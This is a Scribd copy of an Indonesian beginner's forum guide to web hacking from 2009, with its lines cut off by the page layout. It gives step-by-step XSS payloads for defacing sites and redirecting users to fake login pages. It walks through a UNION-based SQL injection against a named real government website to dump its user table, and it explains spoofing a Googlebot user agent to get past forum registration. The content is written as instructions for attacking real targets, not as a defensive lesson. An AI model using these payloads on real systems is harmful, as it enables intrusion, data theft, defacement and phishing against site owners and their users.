Scribd Logo
Upload

Welcome to Scribd!

  • Dasar Hack Web

    Uploaded by

    Uciha Itachi
    219 views4 pages

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    DOCX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    219 views4 pages

    Dasar Hack Web

    Uploaded by

    Uciha Itachi

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 4

    hacking web untuk pemula

    di karenakan banyak yg minat tentang hacking web iseng2 gue copasin aja teknik2 hack web dari
    beberapa source (sebagian teknik hacking ini masih up to date sebagian dah di patch ama admin situs

    yg di serang tapi metodenya masih bisa kok) 

    Quote:

    1st blood tentang xss neh 


    mungkin ada yg nanya apakah Xss itu 
    XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui brow
    jenis serangan yang paling cupu bagi seorang attacker yang tidak mempunyai Bug atau exploit. dikarenak
    membutuhkan sebuah browser saja.

    1. pertamanya seh kita kudu cari situs yg vurn (bisa di hacking dengan teknik xss) mencari situs yang vuln

    gampang susah, karena kebanyakan situs udah memfilternya, tapi kita bisa menggunakan google untuk ca
    Betul, kita menggunakan Dork dengan query
    Code:
    inurl:"search.php?q="
    atau jika manual kita bisa mencoba fasilitas sebuah site seperti Guest book, Search Box, Shoutboxes, C

    2. Nah sekarang jika sudah kita ketemukan target kita akan mencoba mengexploit site itu dulu, apakah
    vulner terhadap XSS.
    Ok sekarang kita coba menginjeksi dengan kode :
    Code:
    <script>alert("XSS")</script>

    3.   << klo muncul gambar ini tuh situs vurn buat di xs

    4. tapi apakah sekedar itu saja, sekarang kita coba dengan metoda lain, apakah site itu bisa dideface b
    kita coba bagaimana mengattack site yang vulner itu ok.
    dengan penyisipan tag IMG SCR pada sebuah url atau pada comment sekali.
    Apa itu IMG SCR tu bro? IMG SCR itu adalah semacam Tag pemangilan gambar dari suatu link tertentu
    kepada website tersebut.
    pemanggilan tag itu dengan code sebagai berikut 
    Code:
    <html><body><IMG SRC="http://Situs-Upload.com/Gambar_deface_lo.Jpeg"></body></html>
    5. tapi terlebih dahulu gambar deface lo bisa upload dulu ke hostingan, misalnya ke photobucket atau f
    url nya dengan url gambar tadi.
    hingga menjadi seperti seperti berikut :
    Code:
    <html><body><IMG SRC="http://Photobucket/Gambar_deface_gw.Jpeg"></body></html>
    6. nah setelah siap kemudian sisipkan pada URl situs yang mempunyai bug tadi hingga menjadi seperti
    Code:
    http://www.Target.ac.id/search/?q=<html><body><IMG
    SRC="http://Photobucket/Gambar_deface_gw.Jpeg"></body></html>
    7. kemudian apa yang terjadi???

    maka situs yang mempunyai bug tadi akan berubah tampilan menjadi gambar yang kita upload tadi 

    8. metode penyisipan lain selain dengan gambar juga bisa kita lakukan misalnya dengan file flash (SWF
    mempunyai style tersendiri contoh code yg di gunakan seperti ini >>>
    Code:
    <EMBED SRC="http://site.com/xss.swf
    dengan penyisipan tag tersebut maka akan langsung meng exekusi file SWF pada link tersebut.
    atau mungkin dengan melakukan redirect ke situs lain misalnya dengan code :
    Code:
    <script>window.open( "http://www.google.com/" )</script>
    9. yg maka jika dieksekusi , kita akan di redirect ke situs google, mungkin biasa aja, tapi gimana klo di
    login palsu misalnya fake login yahoo, mungkin bisa berbahaya juga tuh. gue rasa yg lebih master past

    ini 

    Spoiler for credit thk untuk: 


    Quote:

    teknik ke 2 menunya adalah sql injection (targetnya adalah http://www.gunungkidulkab.go.id << tap

    1. Lakukan pengecekan dengan memasukkan karakter tanda petik satu single_quote ( ' ) dan mengujinya
    Code:
    http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870'
    2.Halaman akan menampilkan pesan error
    Code:
    Fatal error: Call to a member function MoveNext() on a non-object in /var/www/sites/gunungkidulkab.g
    berarti neh situs vurn

    3.
    Code:
    http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870+and+1=1
    http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870+and+1=6
    Hasil Uji :
    -Pada pengecekan AND+1=1 yang dihasilkan adalah TRUE, maka halaman akan tampil secara normal.
    -Pada pengecekan AND+1=6 hasilnya adalah FALSE, halaman akan menampilkan pesan kesalahan (tid

    4. Memeriksa jumlah field dari suatu tabel. Perintah yang digunakan adalah ORDER+BY+num, lakuka
    maka halaman akan menampilkan pesan error. Pada contoh kali ini ditemukan batas akhir field sampai
    Code:
    http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870+order+by+14--
    Mengapa ada tanda -- diakhir perintah? Tanda -- adalah parameter komentar pada sintaks sql, bisa jug
    klausa WHEREterdapat perintah sql yg lain entah itu ORDER atau LIMIT. Untuk itu digunakan parame

    Coba bandingkan jika parameter komentar tidak digunakan, meskipun kita melakukan ORDER BY 1 da
    5. Mengeluarkan nomor field untuk menampilkan informasi yang diinginkan. Perintah yang digunakan a
    Code:
    http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=null+union+all+selec
    6. Pada contoh kali ini, variabel id kita beri nilai null agar angka-angka yang kita deklarasikan keluar, a
    dan nama user.
    Code:
    http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=-870+union+all+sele
    7. Selanjutnya kita akan mengeluarkan nama-nama tabel dengan perintah UNION+ALL+SELECT+no
    TABLE_SCHEMA=DATABASE(), agar tabel yang keluar adalah tabel dari database yang digunakan. K
    Code:
    http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=-
    870+union+all+select+1,2,3,4,5,concat_ws(0x2B,version(),database(),user()),7,group_concat(table_n
    Pada perintah diatas, Anda dapat mengganti concat_ws(0x2B,version(),database(),user()) denga

    8. Nama tabel telah kita ketahui, selanjutnya kita akan mengeluarkan nama field dari tabel yang menyi
    adalahUNION+ALL+SELECT+no_field+no_field+GROUP_CONCAT(CO LUMN_NAME)+FROM+IN
    sehingga menjadi0x74626C70656E6767756E61
    Code:
    http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=-870+union+all+sele
    9. Langkah terakhir kita akan mengeluarkan record-record dari tabel tblpengguna. Sintaks dasarnyaU
    contoh kasus kali ini menjadi :
    Code:
    http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=-870+union+all+sele
    Spoiler for credit thk untuk: 

    nb: itu adalah teknik dasar buat sql injektion terkadang di perlukan ketekunan untuk menemukan bug

    gunakan berbgai tools buat sql injection  )

    Quote:

    klo sudah entar ada peringatan gak papa masuk aja terus >> entar kalian akan liat string
    register buat setingan firefox
    2. masukan string ini di setingan register ff (bikin string baru dengan format text)
    Code:
    general.useragent.extra.firefox
    maka akan muncul defaultnya >> firefox/3.0.10 << ganti dengan
    Code:
    Googlebot/2.X (http://www.googlebot.com/bot.html)
    3. restart ff klo bener kalian bisa liat beberapa web atau forum yg kudu regis tanpa perlu

    regis (di status user akan terlihat ada googlebot << itu elu   )

    sebenernya neh trik lama tapi masih lumayan juga lo   


    nb: klo cara ini jalan lo bakalan susah regis di forum yg isa di tembus (soalnya kolom

    regisnya ilang)  untuk beberapa forum dah gak isa pake cara ini soalnya dah
    make script baru atau di blok oleh adminnya 

    Terakhir di-edit oleh gungbaster; 25-05-2009 Pk. 01:26 AM. Alasan: tambah lagi

    You might also like